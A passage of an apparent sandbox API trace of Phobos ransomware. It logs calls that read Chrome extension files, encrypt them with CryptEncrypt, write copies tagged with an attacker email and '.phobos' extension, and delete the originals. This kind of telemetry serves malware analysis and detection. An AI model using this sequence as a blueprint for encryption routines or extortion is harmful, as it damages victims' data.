returned 0x138 [0151.971] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.971] CloseHandle (hObject=0x138) returned 1 [0151.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json")) returned 0x2020 [0151.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.971] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.971] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.972] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.972] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.972] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.973] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.973] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.974] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.974] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.974] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.974] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.974] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.974] CloseHandle (hObject=0x138) returned 1 [0151.974] CloseHandle (hObject=0x130) returned 1 [0151.974] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json")) returned 1 [0151.975] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.975] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.975] CloseHandle (hObject=0x130) returned 1 [0151.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json")) returned 0x2020 [0151.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.976] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.976] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.976] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.976] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.976] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.977] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.977] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.978] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.978] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.978] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.978] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.978] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.978] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.978] CloseHandle (hObject=0x130) returned 1 [0151.978] CloseHandle (hObject=0x138) returned 1 [0151.979] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json")) returned 1 [0151.979] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.980] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10089) returned 1 [0151.980] CloseHandle (hObject=0x138) returned 1 [0151.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json")) returned 0x2020 [0151.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.980] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.980] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.030] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.030] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.030] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2769, lpOverlapped=0x0) returned 1 [0152.191] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2770, dwBufLen=0x2770 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2770) returned 1 [0152.191] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2770, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2770, lpOverlapped=0x0) returned 1 [0152.192] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.192] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.192] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0152.192] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.192] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0152.192] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.192] CloseHandle (hObject=0x138) returned 1 [0152.192] CloseHandle (hObject=0x130) returned 1 [0152.192] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json")) returned 1 [0152.193] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.194] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=157) returned 1 [0152.194] CloseHandle (hObject=0x130) returned 1 [0152.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png")) returned 0x2020 [0152.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.194] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.194] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.195] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.195] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.195] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9d, lpOverlapped=0x0) returned 1 [0152.216] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0, dwBufLen=0xa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0) returned 1 [0152.216] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa0, lpOverlapped=0x0) returned 1 [0152.217] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.217] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.217] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0152.217] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.217] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0152.218] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.218] CloseHandle (hObject=0x130) returned 1 [0152.218] CloseHandle (hObject=0x138) returned 1 [0152.218] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png")) returned 1 [0152.219] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.220] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=254) returned 1 [0152.220] CloseHandle (hObject=0x138) returned 1 [0152.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json")) returned 0x2020 [0152.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.220] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.220] SetFilePointerEx 